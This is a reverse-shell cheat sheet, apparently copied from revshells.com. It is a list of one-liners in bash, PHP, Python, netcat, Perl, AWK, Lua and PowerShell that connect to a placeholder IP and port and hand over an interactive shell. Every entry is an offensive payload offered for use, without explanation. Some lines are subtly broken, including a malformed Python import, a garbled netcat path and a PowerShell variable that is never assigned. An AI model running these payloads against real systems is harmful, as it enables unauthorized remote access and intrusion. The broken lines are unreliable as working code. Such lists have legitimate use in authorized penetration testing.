=================================================
https://www.revshells.com/
=================================================
[+ BASH]
bash -i >& /dev/tcp/%IP%/%PORT% 0>&1

=================================================
[+ PHP]
php -r '$sock=fsockopen("%IP%",%PORT%);exec("/bin/sh -i <&3 >&3 2>&3");'

=================================================
[+ Python]
python -c 'import socket,subprocess.os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%IP%",%PORT%));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("%IP%",%PORT%));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("/bin/sh")'

=================================================
[+ NETCAT]
rm /tmpf;mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc %IP% %PORT% >/tmp/f
nc -c /bin/sh %IP% %PORT%
nc -e /bin/sh %IP% %PORT%

=================================================
[+ PERL]
perl%20-e%20'use%20Socket;$i=%22%IP%%22;$p=%PORT%;socket(S,PF_INET,SOCK_STREAM,getprotobyname(%22tcp%22));if(connect(S,sockaddr_in($p,inet_aton($i))))%7Bopen(STDIN,%22%3E&S%22);open(STDOUT,%22%3E&S%22);open(STDERR,%22%3E&S%22);exec(%22/bin/sh%20-i%22);%7D;'

=================================================
[+ AWK]
awk 'BEGIN {s = "/inet/tcp/0/%IP%/%PORT%"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

=================================================
[+ LUA]
lua -e "require('socket');require('os');t=socket.tcp();t:connect('%IP%','%PORT%');os.execute('/bin/sh -i <&3 >&3 2>&3');"

=================================================
[+ PowerShell]
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("%IP%",%PORT%);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

